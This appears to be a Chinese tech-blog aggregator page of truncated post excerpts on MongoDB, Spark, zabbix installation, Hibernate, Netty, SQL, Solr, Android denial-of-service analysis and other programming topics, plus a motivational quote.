励志经典语录 bijian1013 励志人生
经典语录1: 哈佛有一个著名的理论：人的差别在于业余时间，而一个人的命运决定于晚上8点到10点之间。每晚抽出2个小时的时间用来阅读、进修、思考或参加有意的演讲、讨论，你会发现，你的人生正在发生改变，坚持数年之后，成功会向你招手。不要每天抱着QQ/MSN/游戏/电影/肥皂剧……奋斗到12点都舍不得休息，看就看一些励志的影视或者文章，不要当作消遣；学会思考人生，学会感悟人生
[MongoDB学习笔记三]MongoDB分片 bit1129 mongodb
MongoDB的副本集(Replica Set)一方面解决了数据的备份和数据的可靠性问题，另一方面也提升了数据的读写性能。MongoDB分片(Sharding)则解决了数据的扩容问题，MongoDB作为云计算时代的分布式数据库，大容量数据存储，高效并发的数据存取，自动容错等是MongoDB的关键指标。本篇介绍MongoDB的切片(Sharding) 1.何时需要分片 &nbs
【Spark八十三】BlockManager在Spark中的使用场景 bit1129 manager
1. Broadcast变量的存储，在HttpBroadcast类中可以知道 2. RDD通过CacheManager存储RDD中的数据，CacheManager也是通过BlockManager进行存储的 3. ShuffleMapTask得到的结果数据，是通过FileShuffleBlockManager进行管理的，而FileShuffleBlockManager最终也是使用BlockMan
yum方式部署zabbix ronin47 yum方式部署zabbix
安装网络yum库#rpm -ivh http://repo.zabbix.com/zabbix/2.4/rhel/6/x86_64/zabbix-release-2.4-1.el6.noarch.rpm 通过yum装mysql和zabbix调用的插件还有agent代理#yum install zabbix-server-mysql zabbix-web-mysql mysql-
Hibernate4和MySQL5.5自动创建表失败问题解决方法 byalias J2EE Hibernate4
今天初学Hibernate4，了解了使用Hibernate的过程。大体分为4个步骤： ①创建hibernate.cfg.xml文件 ②创建持久化对象 ③创建*.hbm.xml映射文件 ④编写hibernate相应代码在第四步中，进行了单元测试，测试预期结果是hibernate自动帮助在数据库中创建数据表，结果JUnit单元测试没有问题，在控制台打印了创建数据表的SQL语句，但在数据库中
Netty源码学习-FrameDecoder bylijinnan java netty
Netty 3.x的user guide里FrameDecoder的例子，有几个疑问： 1.文档说：FrameDecoder calls decode method with an internally maintained cumulative buffer whenever new data is received. 为什么每次有新数据到达时，都会调用decode方法？ 2.Dec
SQL行列转换方法 chicony 行列转换
create table tb(终端名称 varchar(10) , CEI分值 varchar(10) , 终端数量 int) insert into tb values('三星' , '0-5' , 74) insert into tb values('三星' , '10-15' , 83) insert into tb values('苹果' , '0-5' , 93)
中文编码测试 ctrain 编码
循环打印转换编码 String[] codes = { "iso-8859-1", "utf-8", "gbk", "unicode" }; for (int i = 0; i < codes.length; i++) { for (int j
hive 客户端查询报堆内存溢出解决方法 daizj hive 堆内存溢出
hive> select * from t_test where ds=20150323 limit 2; OK Exception in thread "main" java.lang.OutOfMemoryError: Java heap space 问题原因： hive堆内存默认为256M 这个问题的解决方法为：修改/us
人有多大懒，才有多大闲 (评论『卓有成效的程序员』) dcj3sjt126com 程序员
卓有成效的程序员给我的震撼很大，程序员作为特殊的群体，有的人可以这么懒，懒到事情都交给机器去做，而有的人又可以那么勤奋，每天都孜孜不倦得做着重复单调的工作。在看这本书之前，我属于勤奋的人，而看完这本书以后，我要努力变成懒惰的人。不要在去庞大的开始菜单里面一项一项搜索自己的应用程序，也不要在自己的桌面上放置眼花缭乱的快捷图标
Eclipse简单有用的配置 dcj3sjt126com eclipse
1、显示行号 Window -- Prefences -- General -- Editors -- Text Editors -- show line numbers 2、代码提示字符 Window ->Perferences，并依次展开 Java -> Editor -> Content Assist，最下面一栏 auto-Activation
在tomcat上面安装solr4.8.0全过程 eksliang Solr solr4.0后的版本安装 solr4.8.0安装
转载请出自出处： http://eksliang.iteye.com/blog/2096478 首先solr是一个基于java的web的应用，所以安装solr之前必须先安装JDK和tomcat，我这里就先省略安装tomcat和jdk了第一步：当然是下载去官网上下载最新的solr版本，下载地址
Android APP通用型拒绝服务、漏洞分析报告 gg163 漏洞 android APP 分析
点评：记得曾经有段时间很多SRC平台被刷了大量APP本地拒绝服务漏洞，移动安全团队爱内测（ineice.com）发现了一个安卓客户端的通用型拒绝服务漏洞，来看看他们的详细分析吧。 0xr0ot和Xbalien交流所有可能导致应用拒绝服务的异常类型时，发现了一处通用的本地拒绝服务漏洞。该通用型本地拒绝服务可以造成大面积的app拒绝服务。针对序列化对象而出现的拒绝服务主要
HoverTree项目已经实现分层 hvt 编程 .net Web C#ASP.ENT
HoverTree项目已经初步实现分层，源代码已经上传到 http://hovertree.codeplex.com请到SOURCE CODE查看。在本地用SQL Server 2008 数据库测试成功。数据库和表请参考：http://keleyi.com/a/bjae/ue6stb42.htmHoverTree是一个ASP.NET 开源项目，希望对你学习ASP.NET或者C#语言有帮助，如果你对
Google Maps API v3: Remove Markers 移除标记天梯梦 google maps api
Simply do the following: I. Declare a global variable: var markersArray = []; II. Define a function: function clearOverlays() { for (var i = 0; i < markersArray.length; i++ )
jQuery选择器总结 lq38366 jquery 选择器
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40
基础数据结构和算法六：Quick sort sunwinner Algorithm Quicksort
Quick sort is probably used more widely than any other. It is popular because it is not difficult to implement, works well for a variety of different kinds of input data, and is substantially faster t
如何让Flash不遮挡HTML div元素的技巧_HTML/Xhtml_网页制作刘星宇 html Web
今天在写一个flash广告代码的时候，因为flash自带的链接，容易被当成弹出广告，所以做了一个div层放到flash上面，这样链接都是a触发的不会被拦截，但发现flash一直处于div层上面，原来flash需要加个参数才可以。让flash置于DIV层之下的方法，让flash不挡住飘浮层或下拉菜单，让Flash不档住浮动对象或层的关键参数：wmode=opaque。方法如下：
Mybatis实用Mapper SQL汇总示例 wdmcygah sql mysql mybatis 实用
Mybatis作为一个非常好用的持久层框架，相关资料真的是少得可怜，所幸的是官方文档还算详细。本博文主要列举一些个人感觉比较常用的场景及相应的Mapper SQL写法，希望能够对大家有所帮助。不少持久层框架对动态SQL的支持不足，在SQL需要动态拼接时非常苦恼，而Mybatis很好地解决了这个问题，算是框架的一大亮点。对于常见的场景，例如：批量插入/更新/删除，模糊查询，多条件查询，联表查询，